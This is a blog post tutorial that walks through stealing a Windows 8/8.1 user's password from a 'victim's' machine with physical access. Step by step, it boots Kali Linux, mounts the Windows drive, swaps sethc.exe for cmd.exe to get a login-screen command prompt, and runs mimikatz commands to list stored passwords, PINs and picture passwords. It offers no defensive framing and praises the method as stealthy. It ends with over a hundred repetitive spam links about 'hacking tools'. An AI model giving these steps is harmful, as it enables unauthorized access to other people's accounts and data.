Friday, June 2, 2023

Cracking Windows 8/8.1 Passwords With Mimikatz



You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...


Requirements:


  1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
  2. Mimikatz (Download | Blog)
  3. Physical Access to victim's machine
  4. A Working Brain in that Big Head (Download Here)



Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this





9. Now navigate to your usb drive in my case its drive G:




10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)


11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)









That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

Hope you enjoyed the tutorial have fun :)

More information


  1. Hacker Tool Kit
  2. Hacking Tools 2019
  3. Hack Tools Github
  4. Pentest Tools Online
  5. Tools Used For Hacking
  6. Hacking Tools For Kali Linux
  7. Hacker Tools Free Download
  8. Pentest Automation Tools
  9. Hacking Tools Windows
  10. Hacking Tools For Pc
  11. Usb Pentest Tools
  12. Nsa Hacker Tools
  13. Tools For Hacker
  14. Hacker Tools Linux
  15. Hacking Tools Software
  16. Hacker Security Tools
  17. How To Make Hacking Tools
  18. Hacker Tools Free
  19. Hacker Tools For Pc
  20. Pentest Tools Kali Linux
  21. Hack Tools Mac
  22. Ethical Hacker Tools
  23. Pentest Tools Port Scanner
  24. Pentest Tools For Ubuntu
  25. Pentest Tools Find Subdomains
  26. Pentest Tools Website
  27. Hacker
  28. Physical Pentest Tools
  29. Hacking Tools Name
  30. Hack Tools Download
  31. Github Hacking Tools
  32. Hacker Tools For Mac
  33. Hacking Tools Kit
  34. Kik Hack Tools
  35. Pentest Tools Website Vulnerability
  36. Hacker Tools For Ios
  37. Pentest Tools For Windows
  38. Android Hack Tools Github
  39. Hacker
  40. Hacker Techniques Tools And Incident Handling
  41. Hacker Tools 2019
  42. Pentest Reporting Tools
  43. Hackers Toolbox
  44. Hack Tools
  45. Pentest Tools For Android
  46. Hacker Tools Software
  47. Termux Hacking Tools 2019
  48. Hackrf Tools
  49. Pentest Tools Free
  50. Hack Tool Apk No Root
  51. Hacking Tools Online
  52. Hack Tools For Windows
  53. Tools 4 Hack
  54. Underground Hacker Sites
  55. Tools For Hacker
  56. Hack App
  57. Hak5 Tools
  58. Hacker Tools Apk
  59. Hacker Tools Apk
  60. Free Pentest Tools For Windows
  61. Hacker Tools Apk
  62. Hacking Tools 2020
  63. Hacker Tool Kit
  64. Best Hacking Tools 2019
  65. Pentest Tools Tcp Port Scanner
  66. Hacking Tools For Beginners
  67. Hacking Tools Usb
  68. Hack Tools Download
  69. Hack Tools
  70. Hacking Tools And Software
  71. Hacking Tools Free Download
  72. Bluetooth Hacking Tools Kali
  73. Wifi Hacker Tools For Windows
  74. Hack Tools For Pc
  75. What Is Hacking Tools
  76. New Hack Tools
  77. Hacking Apps
  78. Hack Tools Mac
  79. Pentest Tools Android
  80. What Is Hacking Tools
  81. Hacking Tools Online
  82. Hacker Tools Hardware
  83. Hacking Tools Kit
  84. Tools Used For Hacking
  85. Pentest Tools Download
  86. How To Install Pentest Tools In Ubuntu
  87. Hack App
  88. Usb Pentest Tools
  89. Beginner Hacker Tools
  90. Underground Hacker Sites
  91. Hacker Tools Software
  92. How To Make Hacking Tools
  93. Best Pentesting Tools 2018
  94. Hacker Tools 2019
  95. Hacking Tools For Windows 7
  96. Pentest Tools Windows
  97. Pentest Box Tools Download
  98. Hacking Tools For Kali Linux
  99. Pentest Tools Website Vulnerability
  100. Hacker Tool Kit
  101. Hacking Tools And Software
  102. Pentest Tools Port Scanner
  103. Best Hacking Tools 2019
  104. Hacking Tools Windows
  105. Pentest Tools Android
  106. Pentest Tools
  107. Pentest Tools For Ubuntu
  108. Hacker Security Tools
  109. Hacking Tools For Games

No comments:

Post a Comment